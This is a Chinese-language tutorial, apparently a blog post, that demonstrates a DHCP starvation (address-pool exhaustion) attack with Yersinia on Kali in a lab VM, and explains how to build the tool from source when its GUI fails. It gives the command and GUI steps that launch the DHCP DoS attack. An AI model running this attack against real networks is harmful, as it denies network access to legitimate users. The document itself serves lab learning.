DHCP欺骗攻击(耗尽地址池,附带yersinia编译安装解决方案)

*系统: kali
*主机: Pve虚拟机
*工具: advanced ip scanner局域网设备ip扫描工具
*Linux软件: yersinia
本文演示攻击环境为内网虚拟机环境,不影响wan

yersinia是一款底层协议入侵工具,它能伪装多种协议的报文并实施欺骗和攻击。
Yersinia具体可以虚拟的报文如下:

Spanning Tree Protocol (STP)

Cisco Discovery Protocol (CDP)

Dynamic Trunking Protocol (DTP)

Dynamic Host Configuration Protocol (DHCP)

Hot Standby Router Protocol (HSRP)

IEEE 802.1QIEEE 802.1X

Inter-Switch Link Protocol (ISL)

VLAN Trunking Protocol (VTP)

例如:夺取生成树stp的根角色,生成虚拟cdp(cisco 发现协议)邻居。在一个hsrp冗余型网络环境中伪装成一个活动的路由器、制造假dhcp 报文反馈,耗尽dhcp 地址池等等。

安装yersinia工具

1
sudo apt-get install yersinia

Yersinia常用命令参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
命令行使用方法
Yersinia Protocol -interface eth -attack id
# 示例:
yersinia dhcp -interface eth0 -attack 0


h 帮助屏幕
x 选择并执行攻击
i 选择网卡
ENTER 关于选择项目的信息
v 查看数据包的16进制
d 加载协议默认值
e 编辑数据表字段
f 列出捕获文件
s 从协议保存数据包
S 保存-来自所有协议的数据包
L 从网络学习数据包
N 设置Mac欺骗开/关
l 列出正在运行的攻击
K 杀死所有正在运行的攻击
c 清除当前协议statc
C 清除所有协议状态
g 转到其他协议屏幕
ctrl-l 重绘屏幕
w 写入配置文件
a 关于这个工具
q 退出

启动图形化界面

1
yersinia -G

使用示例

点击Launch Attack,选着DHCP选项卡,选着sending DISCOVER packet,并勾选Dos选项,点击OK保存
Launch Attack

点击菜单的Action中的execute attack执行攻击
Actiono

无法启动GUI模式(-G)解决方案

报错

先完全卸载yersinia包和依赖

1
2
apt remove --auto-remove yersinia
apt purge --auto-remove yersinia

从github克隆编译安装

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
git clone https://github.com/tomac/yersinia /opt/yersinia
// 从github克隆到/opt/yersinia
apt install autoconf libgtk-3-dev libnet1-dev libgtk2.0-dev libpcap-dev -y
// 安装一些编译所需的依赖包(这些包是必须的)

// 编译:
cd /opt/yersinia
./autogen.sh
// 用gtk编译yersinia
./configure --with-gtk
// 完成编译
make
make install

// 打开yersinia GUI
yersinia -G

GUI